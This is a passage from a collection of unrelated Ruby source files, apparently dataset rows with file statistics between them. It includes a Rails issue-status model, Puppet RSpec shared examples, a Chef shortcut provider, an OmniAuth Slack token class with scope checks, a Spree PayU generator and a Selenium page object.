  validates :problem, presence: true, uniqueness: { scope: :team_id }
  validates :team, presence: true

  # Workflow states:
  #   unsolved:    not yet handled
  #   in_progress: being handled
  #   solved:      resolved
  enum status: {
    unsolved: 1,
    in_progress: 2,
    solved: 3
  }

  belongs_to :problem
  belongs_to :team
  has_many :comments, dependent: :destroy, class_name: 'IssueComment'

  # Display "in_progress" as "unsolved" to everyone except staff.
  def response_status(team:)
    return 'unsolved' if !team.staff? && in_progress?
    status
  end

  # Cycle the status when the issue is clicked; staff and non-staff move
  # through different transitions. Raises UnhandledIssueStatus on an
  # unknown status string.
  def transition_by_click(team:)
    case status
    when 'unsolved'
      self.status = team.staff? ? 'in_progress' : 'solved'
    when 'in_progress'
      self.status = 'solved'
    when 'solved'
      self.status = team.staff? ? 'in_progress' : 'unsolved'
    else
      raise UnhandledIssueStatus, status
    end
  end

  # Adjust the status as a side effect of a comment: a staff comment marks an
  # unsolved issue as in progress, a player comment (re)opens it.
  def transition_by_comment(team:)
    case status
    when 'unsolved'
      self.status = 'in_progress' if team.staff?
    when 'in_progress'
      self.status = 'unsolved' if team.player?
    when 'solved'
      self.status = 'unsolved' if team.player?
    else
      raise UnhandledIssueStatus, status
    end
  end
end
| 22.418182 | 69 | 0.664234 |
91021deed10e6954a9b73ab9156225c881f3a0d7 | 3,784 | # frozen_string_literal: true
require 'spec_helper'
# Shared examples asserting that `name` is the type's namevar parameter.
shared_examples 'generic namevar' do |name|
  it { expect(described_class.attrtype(name)).to eq :param }

  it 'is the namevar' do
    expect(described_class.key_attributes).to eq [name]
  end
end
# Shared examples for a standard `ensure` property. Pass an explicit list of
# accepted values, or pass nothing to use the present/absent defaults.
shared_examples 'generic ensurable' do |*allowed|
  # A splat parameter is [] (truthy) when no arguments are given, so the old
  # `allowed ||= ...` never applied the defaults and the per-value examples
  # silently never ran. Check emptiness instead.
  allowed = [:present, :absent, 'present', 'absent'] if allowed.empty?

  context 'attrtype' do
    it { expect(described_class.attrtype(:ensure)).to eq :property }
  end

  context 'class' do
    it do
      expect(described_class.propertybyname(:ensure).ancestors).
        to include(Puppet::Property::Ensure)
    end
  end

  it 'defaults to :present' do
    expect(described_class.new(name: 'test').should(:ensure)).to eq(:present)
  end

  allowed.each do |value|
    it "supports #{value.inspect} as a value to :ensure" do
      expect { described_class.new(name: 'nobody', ensure: value) }.not_to raise_error
    end
  end

  it 'rejects unknown values' do
    expect { described_class.new(name: 'nobody', ensure: :foo) }.to raise_error(Puppet::Error)
  end
end
# Shared examples for a boolean *parameter* (cf. 'boolean property' below).
# NOTE(review): the `_default` argument is currently unused — confirm whether
# a default-value assertion was intended here.
shared_examples 'boolean parameter' do |param, _default|
  it 'does not allow non-boolean values' do
    expect do
      described_class.new(:name => 'foo', param => 'unknown')
    end.to raise_error Puppet::ResourceError, %r{Valid values are true, false}
  end
end
# Shared examples for a property with a validated value set and optional
# default. `allowed` values must be accepted, `disallowed` values rejected.
shared_examples 'validated property' do |param, default, allowed, disallowed|
  context 'attrtype' do
    it { expect(described_class.attrtype(param)).to eq :property }
  end

  context 'allowed' do
    allowed.each do |value|
      it "supports #{value} as a value" do
        expect { described_class.new(:name => 'nobody', param => value) }.
          not_to raise_error
      end
    end
  end

  context 'disallowed' do
    disallowed&.each do |value|
      it "rejects #{value} as a value" do
        # Bug fix: this previously passed the literal symbol :value instead of
        # the loop variable, so every example exercised the same bogus input.
        expect { described_class.new(:name => 'nobody', param => value) }.
          to raise_error(Puppet::Error)
      end
    end
  end

  context 'default' do
    if default.nil?
      it 'has no default value' do
        resource = described_class.new(name: 'nobody')
        expect(resource.should(param)).to be_nil
      end
    else
      it "defaults to #{default}" do
        resource = described_class.new(name: 'nobody')
        expect(resource.should(param)).to eq default
      end
    end
  end
end
# Shared examples for a property declared with array_matching => :all,
# i.e. the whole array is compared/managed rather than single members.
shared_examples 'array_matching property' do |param, default|
  context 'attrtype' do
    it { expect(described_class.attrtype(param)).to eq :property }
  end

  context 'array_matching' do
    it { expect(described_class.attrclass(param).array_matching).to eq :all }
  end

  it 'supports an array of mixed types' do
    value = [true, 'foo']
    resource = described_class.new(name: 'test', param => value)
    expect(resource[param]).to eq value
  end

  context 'default' do
    if default.nil?
      it 'has no default value' do
        resource = described_class.new(name: 'nobody')
        expect(resource.should(param)).to be_nil
      end
    else
      it "defaults to #{default}" do
        resource = described_class.new(name: 'nobody')
        expect(resource.should(param)).to eq default
      end
    end
  end
end
# Shared examples for a boolean *property*: rejects non-boolean input and
# delegates the allowed-values/default checks to 'validated property'.
shared_examples 'boolean property' do |param, default|
  it 'does not allow non-boolean values' do
    expect do
      described_class.new(:name => 'foo', param => 'unknown')
    end.to raise_error Puppet::ResourceError, %r{Invalid value "unknown". Valid values are true, false.}
  end

  it_behaves_like 'validated property', param, default, [true, false, 'true', 'false', :true, :false]
end
# Shared examples for a read-only property: any write attempt must fail.
shared_examples 'readonly property' do |param|
  it 'is readonly' do
    expect do
      described_class.new(:name => 'foo', param => 'invalid')
    end.to raise_error(Puppet::Error, %r{#{param} is read-only})
  end
end
| 28.02963 | 104 | 0.667548 |
6115a1bcc62ced5d0196cfb00803a7a341c07c2f | 119 | class Email
include Mongoid::Document
field :address
validates_uniqueness_of :address
embedded_in :patient
end
| 17 | 34 | 0.798319 |
2833fd1be0f0ff00f33b31d9cc5ede05afd1a992 | 287 | class StaticPagesController < ApplicationController
# Home page: signed-in users get a micropost form and their paginated feed;
# guests get the plain static page.
def home
  if logged_in?
    @micropost = current_user.microposts.build
    @feed_items = current_user.feed.paginate(page: params[:page])
  end
end

# The remaining actions render their static templates with no setup.
def help
end

def about
end

def contact
end
end
| 13.666667 | 67 | 0.66899 |
1d726c9a1e700fc5f507592ae3ec463390d50b89 | 109 | # frozen_string_literal: true
Ralyxa::Skill.intent 'AMAZON.NextIntent' do
# TODO: respond('TBD Next')
end
| 18.166667 | 43 | 0.743119 |
01f76ef7fbbbb7460ac8d013dbe12714e8bfed6e | 280 | module Cucumber
module Ast
  # Deprecated shim: instantiating Cucumber::Ast::Visitor always raises a
  # RuntimeError carrying DEPRECATION_WARNING, so old subclasses fail loudly
  # instead of silently misbehaving.
  class Visitor
    DEPRECATION_WARNING = "Cucumber::Ast::Visitor is deprecated and will be removed. You no longer need to inherit from this class."

    # step_mother is accepted for signature compatibility and ignored.
    def initialize(step_mother)
      raise(DEPRECATION_WARNING)
    end
  end
end
end
| 23.333333 | 134 | 0.703571 |
e9a765bfc7671cdc205048773d65b43a3d90e2ad | 1,784 | require 'puppet'
require 'beaker-rspec/spec_helper'
require 'beaker-rspec/helpers/serverspec'
# overriding puppet installation for the RedHat family distros due to
# puppet breakage >= 3.5
# Custom puppet installation for the RedHat family, pinned to 3.4.2 because
# puppet >= 3.5 is broken for these acceptance tests; all other platforms
# fall through to the stock beaker helper via super().
def install_puppet(host)
  # The original code ran this regex match twice, discarding the first
  # result; a single match inside the condition is sufficient.
  if host['platform'] =~ /(fedora|el)-(\d+)/
    safeversion = '3.4.2'
    platform = Regexp.last_match(1)
    relver = Regexp.last_match(2)
    on host, "rpm -ivh http://yum.puppetlabs.com/puppetlabs-release-#{platform}-#{relver}.noarch.rpm"
    on host, "yum install -y puppet-#{safeversion}"
  else
    super()
  end
end
RSpec.configure do |c|
# Project root
proj_root = File.expand_path(File.join(File.dirname(__FILE__), '..'))
c.before(:each) do
Puppet::Util::Log.level = :warning
Puppet::Util::Log.newdestination(:console)
end
c.before :suite do
hosts.each do |host|
unless (ENV['RS_PROVISION'] == 'no' || ENV['BEAKER_provision'] == 'no')
begin
on host, 'puppet --version'
rescue
if host.is_pe?
install_pe
else
install_puppet(host)
end
end
end
# Install module and dependencies
puppet_module_install(:source => proj_root, :module_name => File.basename(proj_root).gsub(/^puppet-/,''))
on host, puppet('module', 'install', 'puppetlabs-stdlib', '--version=3.2.0'), { :acceptable_exit_codes => [0,1] }
on host, puppet('module', 'install', 'puppetlabs-java', '--version=1.2.0'), { :acceptable_exit_codes => [0,1] }
on host, puppet('module', 'install', 'puppetlabs-wget', '--version=1.0.0'), { :acceptable_exit_codes => [0,1] }
on host, puppet('module', 'install', 'stahnma-epel', '--version=0.1.0'), { :acceptable_exit_codes => [0,1] } if fact_on(host,'osfamily') == 'RedHat'
end
end
end
| 32.436364 | 154 | 0.619395 |
87574dc3c63c0a9e8055d794a76fdffcc391d0d6 | 2,319 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
config.webpacker.check_yarn_integrity = false
config.hosts << 'skimo-pl'
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
# Run rails dev:cache to toggle caching.
if Rails.root.join('tmp', 'caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.action_controller.enable_fragment_cache_logging = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Highlight code that triggered database queries in logs.
config.active_record.verbose_query_logs = true
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations.
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 36.234375 | 87 | 0.763691 |
91e80e9f6dbf49c67c2d00841d3acf7043dd2095 | 301 | class TwsGecko::ServerDatabaseError < StandardError
# Raw server payload, kept so callers can inspect the failure.
attr_reader :raw

def initialize(raw)
  @raw = raw
  super "No response from database of server"
end
end
class TwsGecko::ServerNoResponseError < StandardError
# raw - optional Hash-like API payload; its 'stat' field becomes the message.
def initialize(raw = nil)
  @raw = raw
  # Guard the nil default: @raw['stat'] previously raised NoMethodError
  # whenever this error was constructed without a payload.
  super(@raw ? @raw['stat'].to_s : 'No response from server')
end
end | 21.5 | 53 | 0.704319 |
01564024c6bba66b837aaa661470e8bad77d9012 | 2,156 | #
# Author:: Doug MacEachern <[email protected]>
# Cookbook:: windows
# Provider:: shortcut
#
# Copyright:: 2010-2016, VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
use_inline_resources
# Loads the shortcut's current state from Windows via the WScript.Shell COM
# object, so the action blocks can diff desired vs. actual attributes.
def load_current_resource
  require 'win32ole'
  # CreateShortcut returns a shortcut object for the path; assumed to carry
  # the existing attributes when the file already exists — TODO confirm.
  @link = WIN32OLE.new('WScript.Shell').CreateShortcut(@new_resource.name)
  @current_resource = Chef::Resource::WindowsShortcut.new(@new_resource.name)
  @current_resource.name(@new_resource.name)
  @current_resource.target(@link.TargetPath)
  @current_resource.arguments(@link.Arguments)
  @current_resource.description(@link.Description)
  @current_resource.cwd(@link.WorkingDirectory)
  @current_resource.iconlocation(@link.IconLocation)
end
# Check to see if the shorcut needs any changes
#
# === Returns
# <true>:: If a change is required
# <false>:: If the shorcuts are identical
def compare_shortcut
  # True when any explicitly-set (non-nil) desired attribute differs from
  # the shortcut's current state.
  %i[target arguments description cwd iconlocation].any? do |attr|
    desired = @new_resource.send(attr)
    !desired.nil? && @current_resource.send(attr) != desired
  end
end
# Creates/updates the shortcut, touching only attributes the resource
# explicitly sets (nil means "leave as is"); no-op when nothing differs.
action :create do
  if compare_shortcut
    @link.TargetPath = @new_resource.target unless @new_resource.target.nil?
    @link.Arguments = @new_resource.arguments unless @new_resource.arguments.nil?
    @link.Description = @new_resource.description unless @new_resource.description.nil?
    @link.WorkingDirectory = @new_resource.cwd unless @new_resource.cwd.nil?
    @link.IconLocation = @new_resource.iconlocation unless @new_resource.iconlocation.nil?
    # ignoring: WindowStyle, Hotkey
    @link.Save
    Chef::Log.info("Added #{@new_resource} shortcut")
    new_resource.updated_by_last_action(true)
  end
end
| 35.344262 | 94 | 0.756957 |
185098bbb9f9f77b6ebd23d814cdef07fae1caf3 | 1,707 | class ListStack
attr_accessor :head
# A singly-linked-list node: a value plus a pointer to the next node (nil at
# the tail). Both keyword arguments are required.
class ListElement
  attr_accessor :value, :next_element

  def initialize(value: , next_element: )
    self.value = value
    self.next_element = next_element
  end
end
# Pushes a value onto the top of the stack (O(1)): the new node becomes the
# head and points at the previous head.
def push(value)
  old_head = self.head
  self.head = ListElement.new(value: value, next_element: old_head)
end
# Needs more tests
# Yields every ListElement from head to tail.
# Returns the last element yielded, or nil for an empty stack.
def each
  current = head
  # Bug fix: previously an empty stack yielded nil and then crashed with
  # NoMethodError on nil.next_element.
  return nil if current.nil?
  yield current
  while current.next_element
    current = current.next_element
    yield current
  end
  current
end
# Number of elements in the stack, counted by walking the list (O(n)).
def length
  return 0 unless head

  total = 0
  each { |_element| total += 1 }
  total
end
# Removes and returns the top value, or nil when the stack is empty.
def pop
  removed = self.head
  # Bug fix: previously popping an empty stack raised NoMethodError on
  # nil.next_element.
  return nil if removed.nil?
  self.head = removed.next_element
  removed.value
end
end
require 'minitest/autorun'
class TestListStack < Minitest::Test
def stack_class
ListStack
end
def test_pushing_an_item
stack = stack_class.new
stack.push 1
assert_equal(1, stack.length)
end
def test_pushing_and_popping_two_items
stack = stack_class.new
stack.push 1
stack.push 456
assert_equal(2, stack.length)
assert_equal(456, stack.pop)
assert_equal(1, stack.pop)
end
def test_popping_an_item
stack = stack_class.new
stack.push 123
assert_equal(123, stack.pop)
assert_equal(0, stack.length)
end
def test_empty_length
stack = stack_class.new
assert_equal(0, stack.length)
end
def test_each
stack = stack_class.new
stack.push 1
stack.push 456
values = []
stack.each do |element|
values << element.value
end
assert_equal([456, 1], values)
end
end
| 17.597938 | 69 | 0.666667 |
1c99321c58d641eeb04a9f6db0f451fc5da13ce2 | 523 | # Import modules
require './Common.rb'
class ExtractAnnotations
# Extracts all annotations from a stored document via the GroupDocs
# Annotation Cloud API and prints the count.
# NOTE(review): the capitalized method name `Run` and the use of globals
# ($api/$request/$response/$config) are non-idiomatic; other sample scripts
# presumably read these globals — confirm before renaming.
def self.Run()
  # Getting instance of the API
  $api = GroupDocsAnnotationCloud::AnnotateApi.from_config($config)

  file_info = GroupDocsAnnotationCloud::FileInfo.new()
  # Path is relative to the configured cloud storage, not the local disk.
  file_info.file_path = "annotationdocs\\input.docx"

  $request = GroupDocsAnnotationCloud::ExtractRequest.new(file_info)

  # Executing an API.
  $response = $api.extract($request)
  puts("ExtractAnnotations: annotations count = " + $response.length.to_s)
end
end | 26.15 | 76 | 0.730402 |
619015196f493c5469b7fe30e802c059829111fc | 10,750 | # :markup: tomdoc
require 'oauth2/access_token'
require 'omniauth-slack/refinements'
require 'omniauth-slack/data_methods'
require 'omniauth-slack/debug'
module OmniAuth
module Slack
using StringRefinements
module OAuth2
# Enhanced subclass of OAuth2::AccessToken, used by OmniAuth::Slack
# whenever an OAuth2::AccessToken is required.
#
# Adds class and instance scope-query method +has_scope?+, and adds
# basic API data methods and access methods.
class AccessToken < ::OAuth2::AccessToken
include OmniAuth::Slack::DataMethods
include OmniAuth::Slack::Debug
# AccessToken instance (self), so Strategy data-methods can be copied to AccessToken without modification.
def access_token; self; end
# Creates simple getter methods to pull specific data from params.
%w(user_name user_email team_id team_name team_domain).each do |word|
obj, atrb = word.split('_')
define_method(word) do
params[word] ||
params[obj].to_h[atrb]
end
end
# Cannonical AccessToken user_id.
def user_id
params['user_id'] ||
params['user'].to_h['id'] ||
params['authorizing_user'].to_h['user_id']
end
# Cannonical AccessToken unique user-team-id combo.
def uid
"#{user_id}-#{team_id}"
end
# Is this a workspace app token?
#
# Returns nil if unknown
# True for workspace-app tokens (token_type 'app' or an 'xoxa' prefix),
# false for classic user tokens ('xoxp' prefix), nil when indeterminate.
def is_app_token?
  if params['token_type'] == 'app' || token.to_s =~ /^xoxa/
    true
  elsif token.to_s =~ /^xoxp/
    false
  end
end
# Is this a token returned from an identity-scoped request?
def is_identity_token?
(params['user_id'] ||
params['user'].to_h['id']) && true || false
end
# Identity scopes (workspace apps only).
# Given _user_id, returns specific identity scopes.
#
# Sets @apps_permissions_users_list with parsed API response.
#
# _user_id - String of Slack user ID.
#
def apps_permissions_users_list(_user_id=nil)
#raise StandardError, "APUL caller #{caller_method_name} user #{_user_id}"
return {} unless is_app_token?
semaphore.synchronize {
@apps_permissions_users_list ||= (
r = get('/api/apps.permissions.users.list').parsed
r['resources'].to_a.inject({}){|h,i| h[i['id']] = i; h} || {}
)
_user_id ? @apps_permissions_users_list[_user_id].to_h['scopes'] : @apps_permissions_users_list
}
end
# Hash of current scopes for this token (workspace apps only).
# Sets +@apps_permissions_scopes_list+ with parsed API response.
def apps_permissions_scopes_list
return {} unless is_app_token?
semaphore.synchronize {
@apps_permissions_scopes_list ||= (
r = get('/api/apps.permissions.scopes.list').parsed
r['scopes'] || {}
)
}
end
# Compiles scopes awarded to this AccessToken.
# Given _user_id, includes +apps.permissions.users.list+.
#
# Sets +@all_scopes+ with parsed API response.
#
# This now puts all compiled scopes back into <tt>params['scopes']</tt>.
#
# _user_id - String of Slack user ID.
#
# Returns Hash of scope Arrays where *key* is scope section
# and *value* is Array of scopes.
#
def all_scopes(_user_id=nil)
  debug{"_user_id: #{_user_id}, @all_scopes: #{@all_scopes}"}
  # Recompute when nothing is cached yet, or when a user id is supplied and
  # the cache lacks the 'identity' section.
  # NOTE(review): `&&` binds tighter than `||`, so this parses as
  # (_user_id && !has_identity) || @all_scopes.nil? — confirm that is intended.
  if _user_id && !@all_scopes.to_h.has_key?('identity') || @all_scopes.nil?
    @all_scopes = (
      scopes = case
      when params['scope']
        # Classic token: a single delimited scope string.
        {'classic' => params['scope'].words}
      when params['scopes']
        params['scopes']
      when is_app_token?
        apps_permissions_scopes_list
      end
      # Identity scopes are only queryable per-user on workspace-app tokens.
      scopes['identity'] = apps_permissions_users_list(_user_id) if _user_id && is_app_token?
      # Cache the compiled result back into params['scopes'].
      params['scopes'] = scopes
    )
  else
    @all_scopes
  end
end
# Match a given set of scopes against this token's awarded scopes,
# classic and workspace token compatible.
#
# If the scope-query is a string, it will be interpreted as a Slack Classic App
# scope string +{classic: scope-query-string}+.
#
# The keywords need to be symbols, so any hash passed as an argument
# (or as the entire set of args) should have symbolized keys!
#
# freeform_array - [*Array, nil] default: [], array of scope query hashes
#
# :query - [Hash, Array, nil] default: nil, a single scope-query Hash (or Array of Hashes)
#
# :logic - [String, Symbol] default: 'or' [:or | :and] logic for the scope-query.
# Applies to a single query hash.
# The reverse logic is applied to an array of query hashes.
#
# :user - [String] (nil) default: nil, user_id of the Slack user to query against
# leave blank for non-user queries
#
# :base - [Hash] default: nil, a set of scopes to query against
# defaults to the awarded scopes on this token
#
# freeform_hash - [**Hash] default: {}, interpreted as single scope query hash
#
# TODO: Does this accept all slack token types? What about bot tokens? Others?
#
def has_scope?(*freeform_array, query: nil, logic:'or', user:nil, base:nil, **freeform_hash)
debug{{freeform_array:freeform_array, freeform_hash:freeform_hash, query:query, logic:logic, user:user, base:base}}
#OmniAuth.logger.debug({freeform_array:freeform_array, freeform_hash:freeform_hash, query:query, logic:logic, user:user, base:base})
query ||= case
when freeform_array.any?; freeform_array
when freeform_hash.any?; freeform_hash
end
return unless query
query = [query].flatten if query.is_a?(Array)
user ||= user_id
debug{"using user '#{user}' and query '#{query}'"}
is_identity_query = case query
when Hash
query.keys.detect{|k| k.to_s == 'identity'}
when Array
query.detect{ |q| q.is_a?(Hash) && q.keys.detect{|k| k.to_s == 'identity'} }
end
base ||= case
when user && is_identity_query
debug{"calling all_scopes(user=#{user}) to build base-scopes"}
all_scopes(user)
else
debug{"calling all_scopes to build base-scopes"}
all_scopes
end
#debug{{freeform_array:freeform_array, freeform_hash:freeform_hash, query:query, logic:logic, user:user, base:base}}
self.class.has_scope?(scope_query:query, scope_base:base, logic:logic)
end
# Matches the given scope_query against the given scope_base, with the given logic.
#
# This is classic and workspace token compatible.
#
# keywords - All arguments are keyword arguments:
#
# :scope_query - [Hash, Array of hashes] default: {}.
# If scope_query is a string, it will be interpreted as +{classic: scope-query-string}+.
#
# key - Symbol of scope type <app_home|team|channel|group|mpim|im|identity|classic>
# value - Array or String of individual scopes
#
# :scope_base - [Hash] defaul: {}, represents the set of scopes to query against.
#
# :logic - [String, Symbol] default: or. One of <and|or>.
# Applies to a single query hash.
# The reverse logic is applied to an array of query hashes.
#
# Examples
#
# has_scope?(scope_query: {channel: 'channels:read chat:write'})
# has_scope?(scope_query: [{identity:'uers:read', channel:'chat:write'}, {app_home:'chat:write'}], logic:'and')
# has_scope?(scope_query: 'identity:users identity:team identity:avatar')
#
# TODO: Remove any code specific to Slack, like classic-vs-workspace handling.
#
# TODO: Can this be added to OAuth2::AccessToken as a generic has_scope? Would it work for other providers?
# It ~should~ work for other providers, according to oauth2 spec https://tools.ietf.org/html/rfc6749#section-3.3
#
def self.has_scope?(scope_query:{}, scope_base:{}, logic:'or')
debug{"class-level-has_scope? scope_query '#{scope_query}' scope_base '#{scope_base}' logic '#{logic}'"}
_scope_query = scope_query.is_a?(String) ? {classic: scope_query} : scope_query
_scope_query = [_scope_query].flatten
_scope_base = scope_base
raise "scope_base must be a hash" unless (_scope_base.is_a?(Hash) || _scope_base.respond_to?(:to_h))
_logic = case
when logic.to_s.downcase == 'or'; {outter: 'all?', inner: 'any?'}
when logic.to_s.downcase == 'and'; {outter: 'any?', inner: 'all?'}
else {outter: 'all?', inner: 'any?'}
end
debug{"logic #{_logic.inspect}"}
_scope_query.send(_logic[:outter]) do |query|
debug{"outter query: #{_scope_query.inspect}"}
query.send(_logic[:inner]) do |section, scopes|
test_scopes = case
when scopes.is_a?(String); scopes.words
when scopes.is_a?(Array); scopes
else raise "Scope data must be a string or array of strings, like this {team: 'chat:write,team:read', channels: ['channels:read', 'chat:write']}"
end
test_scopes.send(_logic[:inner]) do |scope|
debug{"inner query section: #{section.to_s}, scope: #{scope}"}
_scope_base.to_h[section.to_s].to_a.include?(scope.to_s)
end
end
end # scope_query.each
end # self.has_scope?
end # AccessToken
end
end
end | 41.992188 | 161 | 0.560744 |
2688c4ccbad5738dba1d3b4768b30cd08375e872 | 656 | # frozen_string_literal: true
module Sentry
module Gruf
# Current gruf-sentry version
#
# format: 'a.b.c' with possible suffixes such as alpha
# * a is for major version, it is guaranteed to be changed
# if back-compatibility of public API is broken
# * b is for minor version, it is guaranteed to be changed
# on public API changes and also if private API
# back-compatibility is broken
# * c is for incremental version, it is updated in other cases
# According to this, it is enough to specify '~> a.b'
# if private API was not used and to specify '~> a.b.c' if it was
VERSION = "1.1.0"
end
end
| 34.526316 | 69 | 0.670732 |
1cb3966b75724024fa6a63f3105bc86432a0eda3 | 304 | class UpgradeApidaeObjsTitleDataType < ActiveRecord::Migration[5.2]
def change
  add_column :apidae_objs, :title_data, :jsonb
  # Backfill: wrap each legacy plain-text title as {'title' => {'fr' => ...}}.
  # NOTE(review): iterating the model inside a migration couples it to the
  # current class definition, and the data copy makes this migration
  # effectively irreversible despite using `change` — confirm acceptable.
  Apidae::Obj.all.unscoped.each do |o|
    o.update(title_data: {'title' => {'fr' => o.read_attribute(:title)}})
  end
  remove_column :apidae_objs, :title
end
end
| 30.4 | 75 | 0.697368 |
1aff62b5165797fc509d096d2550c1e031edc8d7 | 1,495 | module SpreePayuGateway
module Generators
# Rails generator that wires the spree_payu_gateway engine into a host app.
# Thor runs each public method below in declaration order.
class InstallGenerator < Rails::Generators::Base
  class_option :auto_run_migrations, type: :boolean, default: false

  def self.source_root
    @_config_source_root ||= File.expand_path("../", __FILE__)
  end

  # Registers the PayU checkout script in the frontend asset manifest.
  def add_javascripts
    append_file 'vendor/assets/javascripts/spree/frontend/all.js', "//= require spree/frontend/spree_payu_bolt_checkout\n"
  end

  # Copies the engine's migrations into the host application.
  def add_migrations
    run 'bundle exec rake railties:install:migrations FROM=spree_payu_gateway'
  end

  # Runs migrations when --auto-run-migrations was given or the user agrees
  # at the prompt (empty answer defaults to yes).
  def run_migrations
    # NOTE(review): the local variable shadows the method name; harmless here
    # but worth renaming for clarity.
    run_migrations = options[:auto_run_migrations] || ['', 'y', 'Y'].include?(ask('Would you like to run the migrations now? [Y/n]'))
    if run_migrations
      run 'bundle exec rails db:migrate'
    else
      puts 'Skipping rails db:migrate, don\'t forget to run it!'
    end
  end

  # def install_config_gem
  #   run 'bundle exec rails g config:install'
  #   copy_file 'development.yml', 'config/settings/development.yml', force: true
  #   copy_file 'production.yml', 'config/settings/production.yml', force: true
  #   copy_file 'test.yml', 'config/settings/test.yml', force: true
  # end

  # Installs the frontend and admin payment partials.
  def copy_views
    copy_file 'views/_payu_in.html.erb', 'app/views/spree/checkout/payment/_payu_in.html.erb'
    copy_file 'views/_admin_payu.html.erb', 'app/views/spree/admin/payments/source_views/_payu_in.html.erb'
  end
end
end
end
| 34.767442 | 137 | 0.668227 |
1de3e24fbab55d14d6dc0140d1079abd39748cd9 | 4,419 | # Adding in the require_relative 'logged_in_page' line to ensure that the autoloader does not fail
# with the error "uninitialized constant LoggedInPage (NameError)"
require_relative 'logged_in_page'
require_relative '../page'
require_relative '../project'
require_relative 'select2_module'
class CreateProjectPage < LoggedInPage
include Select2Module
ID_REPO_SELECTOR = 's2id_git_fusion_repo_name'.freeze
ID_SERVER_SELECTOR = 's2id_git_fusion_entry'.freeze
ID_NAMESPACE_SELECTOR = 's2id_project_namespace_id'.freeze
ID_MIRRORORING_DISABLED = 'git_fusion_repo_create_type_disabled'.freeze
ID_MIRRORORING_AUTO_CREATE = 'git_fusion_repo_create_type_auto-create'.freeze
ID_MIRRORORING_IMPORT = 'git_fusion_repo_create_type_import-repo'.freeze
ID_GF_ENTRY = 'git_fusion_entry'.freeze
ID_PROJECT_PATH = 'project_path'.freeze
NAME_COMMIT = 'commit'.freeze
ID_PROJECT_VIS_PRIVATE = 'project_visibility_level_0'.freeze
ID_PROJECT_VIS_INTERNAL = 'project_visibility_level_10'.freeze
ID_PROJECT_VIS_PUBLIC = 'project_visibility_level_20'.freeze
def initialize(driver)
super(driver)
wait_for_gf_options_to_load
verify
end
# Extends the parent page's validation list with this page's locators; the
# Git Fusion widgets are only present when at least one server is configured.
def elements_for_validation
  elems = super
  elems << [:id, ID_PROJECT_PATH] # project name
  elems << [:name, NAME_COMMIT] # create project button
  if servers_exist?
    elems << [:id, ID_MIRRORORING_DISABLED] # Not mirrored
    elems << [:id, ID_MIRRORORING_AUTO_CREATE] # auto-create mirrored
    elems << [:id, ID_MIRRORORING_IMPORT] # mirror existing
    elems << [:id, ID_GF_ENTRY] # GF server selection dropdown
  end
  elems
end
def project_name(name)
field = @driver.find_element(:id, ID_PROJECT_PATH)
field.clear
field.send_keys(name)
end
def namespace(namespace)
select2_select(ID_NAMESPACE_SELECTOR, namespace)
end
def namespaces
select2_options(ID_NAMESPACE_SELECTOR)
end
def selected_namespace
select2_selected(ID_NAMESPACE_SELECTOR)
end
def create_project_and_wait_for_clone
@driver.find_element(:name, NAME_COMMIT).click
ProjectPage.new(@driver)
end
def select_mirrored_none
@driver.find_element(:id, ID_MIRRORORING_DISABLED).click
end
def select_mirrored_auto
@driver.find_element(:id, ID_MIRRORORING_AUTO_CREATE).click
end
def select_mirrored_specific
@driver.find_element(:id, ID_MIRRORORING_IMPORT).click
end
def select_private
@driver.find_element(:id, ID_PROJECT_VIS_PRIVATE).click
end
def select_internal
@driver.find_element(:id, ID_PROJECT_VIS_INTERNAL).click
end
def select_public
@driver.find_element(:id, ID_PROJECT_VIS_PUBLIC).click
end
def repo_names
check_servers_exist
return [] unless repos_exist?
text_values = select2_options(ID_REPO_SELECTOR)
text_values.delete_at(0) if text_values[0] == '<Select repository to enable>'
text_values
end
def selected_repo
check_servers_exist
select2_selected(ID_REPO_SELECTOR)
end
def select_repo(repo)
check_servers_exist
# For PGL-1255
# Need to specifically select mirrored_specific to cater for PGL-1255
# For an unknown reason, the first time you select something using this automation, it doesn't select properly
# which I can't reproduce manually.
# Clicking mirrored_auto then mirrored_specific seems to workaround this issue.
select_mirrored_auto
select_mirrored_specific
# end: For PGL-1255
select2_select(ID_REPO_SELECTOR, repo)
end
def server_names
return [] unless servers_exist?
select2_options(ID_SERVER_SELECTOR)
end
def selected_server
check_servers_exist
select2_selected(ID_SERVER_SELECTOR)
end
def select_server(server)
check_servers_exist
select2_select(ID_SERVER_SELECTOR, server)
wait_for_gf_options_to_load
end
private
def servers_exist?
wait_for(:id, ID_GF_ENTRY)
[email protected]_elements(:id, ID_GF_ENTRY).empty?
end
def check_servers_exist
raise 'No GF servers have been configured, you can\'t interact with them' unless servers_exist?
end
def repos_exist?
wait_for_gf_options_to_load
[email protected]_elements(:id, ID_REPO_SELECTOR).empty?
end
def wait_for_gf_options_to_load
wait_for(:id, ID_MIRRORORING_DISABLED) if servers_exist?
end
end
| 29.264901 | 114 | 0.746549 |
